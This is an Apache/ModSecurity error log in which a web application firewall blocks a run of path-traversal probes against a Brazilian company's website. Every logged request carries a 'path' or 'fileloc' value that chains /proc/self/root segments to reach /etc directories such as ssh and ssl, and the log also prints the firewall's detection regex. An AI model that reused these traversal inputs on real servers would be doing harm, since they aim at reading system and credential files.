[Mon Mar 16 22:07:41.166763 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:59004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipXaQpVkWug9HeOt9jKQAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:07:41.882983 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:52124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipXbABkC4fWIHEf8Eu0wAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:42.060200 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:52124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipXrABkC4fWIHEf8Eu1AAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:43.443453 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.243.203:52128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipX6TCbgAP5jq5TehdFAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:44.615790 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.241.46:51042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipYFajLEzk2WiQ-11FcQAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:07:44.749395 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.243.203:52144] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipYKQpVkWug9HeOt9jLAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:45.916062 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:52154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipYbABkC4fWIHEf8Eu1gAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:49.691069 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:51046] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipZaTCbgAP5jq5TehdHgAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:52.806857 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.243.203:52164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipaEr9dMAiw-8KANN7XAAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:53.135430 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:41072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipadSswJuvopo3lOiTZQAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:07:54.168018 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.243.203:59104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipakr9dMAiw-8KANN7XQAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:55.782724 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.243.203:59106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipa8_BxrYCr4hPDw8crwAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:07:58.188586 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:59110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipbtSswJuvopo3lOiTZwAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:00.657623 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:41088] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipb_9ocpUE4ed4uDwnOQAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 22:08:02.918246 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:58462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipco6lpbStxTqkSkuX4gAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:08:03.068788 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:59122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipc9SswJuvopo3lOiTbgAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:04.114411 2026] [core:alert] [pid 10831:tid 140411674785536] [client 74.7.241.46:58472] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/sys
[Mon Mar 16 22:08:06.919761 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:58476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipdY6lpbStxTqkSkuX6AAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:10.312362 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:57662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipeo6lpbStxTqkSkuX7AAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:11.596467 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.243.203:51254] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipe0r9dMAiw-8KANN7YgAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:12.794941 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.243.203:51258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipfFajLEzk2WiQ-11FeAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:15.151565 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:51264] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipf9SswJuvopo3lOiTcgAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:08:17.503827 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:51278] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abipgbABkC4fWIHEf8Eu5wAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
